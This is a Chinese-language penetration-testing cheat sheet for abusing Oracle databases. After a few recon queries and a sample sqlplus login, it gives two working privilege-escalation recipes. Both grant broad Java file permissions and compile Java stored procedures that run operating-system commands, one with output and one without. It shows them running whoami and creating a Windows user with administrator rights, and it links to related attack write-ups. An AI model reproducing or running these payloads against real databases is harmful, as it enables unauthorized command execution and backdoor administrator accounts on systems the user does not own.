Oracle

  • 查询SID
select instance_name from v$instance
  • 查询当前IP
select sys_context('userenv','ip_address') from dual
  • sqlplus远程连接
sqlplus system/123456@192.168.3.100:1521/orcl
  • oracle 提权 有回显 需要sqlplus

赋权

begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/

创建java代码

create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException;
public class Test
{
public static String list_cmd(String str){
    Runtime runtime=Runtime.getRuntime();
  StringBuffer enco = new StringBuffer();
  enco.append("GBK");
  try{
  Process proc =runtime.exec(str);
  InputStream inp_suc=proc.getInputStream();
  InputStream inp_err=proc.getErrorStream();
  BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
  BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
    String strLine;
      while( (strLine=(bfr_suc.readLine())) != null){
     
      System.out.println(strLine);
          }
  while( (strLine=(bfr_err.readLine())) != null){
     
    System.out.println(strLine);
    }
        proc.destroy();
        inp_suc.close();
        inp_err.close();
    }catch (Exception e) {
      System.out.println("EXECUTE IS ERROR!");
      System.out.println(e.getMessage());
    }
    return "";
  }
     
  /* public static void main(String[] args){
     
      list_cmd(args[0]);
    }
    **/
}

/

create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/

SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');
  • oracle 提权 无回显 需要sqlplus
create or replace and resolve java source named JAVACMD as
    import java.lang.*;
    import java.io.*;
    public class JAVACMD
    {
       public static void execmd(String command) throws IOException
       {
               Runtime.getRuntime().exec(command);
       }
   }
   /

create or replace procedure MYJAVACMD(command in varchar) as language java
    name 'JAVACMD.execmd(java.lang.String)';
/

EXEC MYJAVACMD('net user ASP.NET Admin12345 /add');
EXEC MYJAVACMD('net localgroup administrators Admin12345 /add');

https://loong716.top/posts/Oracle_Database_Security/	渗透过程中Oracle数据库的利用
https://www.helloworld.net/p/5623921467					Oracle数据库提权(dba权限执行系统命令)